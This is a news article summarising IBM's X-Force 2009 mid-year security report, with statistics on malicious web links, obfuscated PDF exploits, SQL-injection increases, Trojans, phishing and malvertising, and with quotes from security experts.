IBM X-Force Security Report Calls Web Insecure
(newsfactor.com) - Web insecurity. That's the two-word summary of IBM's X-Force 2009 Mid-Year Trend and Risk Report. Big Blue released its latest survey Wednesday with some troubling news: Web client, server and content threats are converging to create an untenable risk landscape.
IBM recorded a 508 percent increase in the number of new malicious Web links discovered in the first half of 2009 -- and the problem is no longer limited to malicious domains or untrusted Web sites. The X-Force report points to an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines, and mainstream news sites. The consequence for victims is attackers gaining access to private data.
The X-Force report also discovered evidence that suggests attackers are getting more sophisticated. Veiled Web exploits, especially PDF files, are at an all-time high. PDF vulnerabilities disclosed in the first half of 2009 surpassed findings from all of 2008. From the first quarter to the second quarter alone, the number of suspicious, obfuscated or concealed content monitored by the IBM ISS Managed Security Services team nearly doubled.
Safe Browsing Extinct
"The trends highlighted by the report seem to indicate that the Internet has finally taken on the characteristics of the Wild West where no one is to be trusted," said X-Force Director Kris Lamb. "There is no such thing as safe browsing today and it is no longer the case that only the red-light district sites are responsible for malware. We've reached a tipping point where every Web site should be viewed as suspicious and every user is at risk. The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity."
Web security is no longer just a browser or client-side issue, according to IBM. Criminals are also leveraging insecure Web applications to target users of legitimate Web sites. The X-Force report discovered a sharp increase in Web-application attacks aimed at stealing and manipulating data and taking control of infected computers. SQL-injection attacks rose 50 percent from the fourth quarter 2008 to the first quarter 2009 -- and then nearly doubled from the first quarter to the second quarter.
"Two of the major themes for the first half of 2009 are the increase in sites hosting malware and the doubling of obfuscated Web attacks," Lamb said. "The trends seem to reveal a fundamental security weakness in the Web ecosystem where interoperability between browsers, plug-ins, content and server applications dramatically increases the complexity and risk. Criminals are taking advantage of the fact that there is no such thing as a safe browsing environment and are leveraging insecure Web applications to target legitimate Web-site users."
The Stark Reality
Among other X-Force report findings, vulnerabilities have reached a plateau, Trojans account for more than half of all new malware, phishing has decreased dramatically, URL spam is still number one, image spam is making a comeback, and nearly half of all vulnerabilities remain unpatched.
Trojans accounted for 55 percent of all new malware, a nine percent increase from the first half of 2008. Information-stealing Trojans are the most prevalent. Meanwhile, analysts believe banking Trojans are taking the place of phishing attacks geared toward financial targets. In the first half of 2009, 66 percent of phishing was targeted at the financial industry, down from 90 percent in 2008. Online payment targets made up 31 percent of the share.
Ken Dunham, director of global response for iSIGHT Partners, said the way people use the Internet today is changing the way criminals are attacking. He pointed to malvertising (malicious advertising links) and rogue software makers who are heavily involved in SEO poisoning techniques. When someone surfs the Internet, potentially fraudulent advertising links appear alongside legitimate search results.
"Attackers are using very aggressive techniques, and sometimes they even advertise their rogue products through legitimate advertising agencies," Dunham said. "The reality is that the ads you see may not be safe. These guys use these same techniques around popular media figures to trick people. Just searching the Web can result in you being redirected to a malicious site or any number of other risks. There are many vectors designed for people who surf."